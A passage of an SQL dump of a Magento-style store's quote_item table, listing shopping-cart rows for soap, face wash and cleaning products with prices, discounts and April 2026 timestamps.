(317, 907, '2026-04-04 16:06:07', '2026-04-04 16:06:07', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(318, 908, '2026-04-04 16:06:12', '2026-04-04 16:06:12', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(319, 909, '2026-04-04 16:06:16', '2026-04-04 16:06:16', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(320, 910, '2026-04-04 16:06:21', '2026-04-04 16:06:21', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(321, 911, '2026-04-04 16:06:26', '2026-04-04 16:06:26', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(322, 913, '2026-04-04 21:28:23', '2026-04-04 21:28:23', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(323, 914, '2026-04-05 02:04:38', '2026-04-05 02:04:56', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 12.0000, 422.0000, 422.0000, NULL, 20.0000, 1012.8000, 1012.8000, 0.0000, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(324, 915, '2026-04-05 03:34:36', '2026-04-05 03:34:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(325, 917, '2026-04-05 09:41:23', '2026-04-05 09:41:23', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(326, 919, '2026-04-05 16:19:38', '2026-04-05 16:19:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(327, 921, '2026-04-05 22:09:08', '2026-04-05 22:09:25', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 6.0000, 422.0000, 422.0000, NULL, 20.0000, 506.4000, 506.4000, 0.0000, 0.0000, 0.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(328, 922, '2026-04-05 22:26:25', '2026-04-05 22:26:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(329, 925, '2026-04-06 04:23:58', '2026-04-06 04:23:58', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(330, 927, '2026-04-06 10:39:13', '2026-04-06 10:39:13', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(331, 930, '2026-04-06 17:31:08', '2026-04-06 17:31:08', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(332, 933, '2026-04-07 00:12:36', '2026-04-07 00:12:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(333, 935, '2026-04-07 06:43:27', '2026-04-07 06:43:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(334, 937, '2026-04-07 13:33:32', '2026-04-07 13:33:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(335, 939, '2026-04-07 20:19:52', '2026-04-07 20:19:52', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(336, 941, '2026-04-08 02:59:30', '2026-04-08 02:59:30', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(337, 944, '2026-04-08 09:51:34', '2026-04-08 09:51:34', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(338, 946, '2026-04-08 16:57:55', '2026-04-08 16:57:55', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(339, 947, '2026-04-08 17:12:07', '2026-04-08 17:12:23', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 6.0000, 422.0000, 422.0000, NULL, 20.0000, 506.4000, 506.4000, 0.0000, 0.0000, 0.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(340, 949, '2026-04-08 23:43:53', '2026-04-08 23:43:53', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(341, 951, '2026-04-09 05:27:51', '2026-04-09 05:27:51', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(342, 951, '2026-04-09 05:27:56', '2026-04-09 05:28:29', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, '2,3', NULL, 0, 0, 0.0000, 17.0000, 32.0000, 32.0000, NULL, 20.0000, 108.8000, 108.8000, 0.0000, 0.0000, 0.0000, 544.0000, 544.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 544.0000, 544.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(343, 959, '2026-04-09 06:19:57', '2026-04-09 06:19:57', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(344, 960, '2026-04-09 06:39:35', '2026-04-09 06:39:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(345, 962, '2026-04-09 06:55:20', '2026-04-09 06:55:20', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(346, 964, '2026-04-09 14:01:38', '2026-04-09 14:01:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(347, 966, '2026-04-09 21:09:28', '2026-04-09 21:09:28', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(348, 968, '2026-04-10 09:21:22', '2026-04-10 09:21:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(349, 969, '2026-04-10 16:25:50', '2026-04-10 16:25:50', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(350, 973, '2026-04-10 23:17:32', '2026-04-10 23:17:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
INSERT INTO `quote_item` (`item_id`, `quote_id`, `created_at`, `updated_at`, `product_id`, `store_id`, `parent_item_id`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `weight`, `qty`, `price`, `base_price`, `custom_price`, `discount_percent`, `discount_amount`, `base_discount_amount`, `tax_percent`, `tax_amount`, `base_tax_amount`, `row_total`, `base_row_total`, `row_total_with_discount`, `row_weight`, `product_type`, `base_tax_before_discount`, `tax_before_discount`, `original_custom_price`, `redirect_url`, `base_cost`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `gift_message_id`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(351, 975, '2026-04-11 04:15:34', '2026-04-11 04:15:34', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(352, 976, '2026-04-11 04:15:44', '2026-04-11 04:15:44', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(353, 977, '2026-04-11 04:15:49', '2026-04-11 04:15:49', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(354, 978, '2026-04-11 04:15:54', '2026-04-11 04:15:54', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(355, 979, '2026-04-11 04:15:57', '2026-04-11 04:15:57', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(356, 980, '2026-04-11 04:16:00', '2026-04-11 04:16:00', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(357, 981, '2026-04-11 04:16:08', '2026-04-11 04:16:08', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(358, 982, '2026-04-11 04:16:10', '2026-04-11 04:16:10', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(359, 983, '2026-04-11 04:16:14', '2026-04-11 04:16:14', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(360, 985, '2026-04-11 04:16:36', '2026-04-11 04:16:36', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(361, 986, '2026-04-11 04:16:39', '2026-04-11 04:16:39', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(362, 988, '2026-04-11 04:17:00', '2026-04-11 04:17:00', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(363, 990, '2026-04-11 04:17:21', '2026-04-11 04:17:21', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(364, 992, '2026-04-11 04:17:43', '2026-04-11 04:17:43', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(365, 994, '2026-04-11 06:17:36', '2026-04-11 06:17:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(366, 995, '2026-04-11 14:10:34', '2026-04-11 14:10:34', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
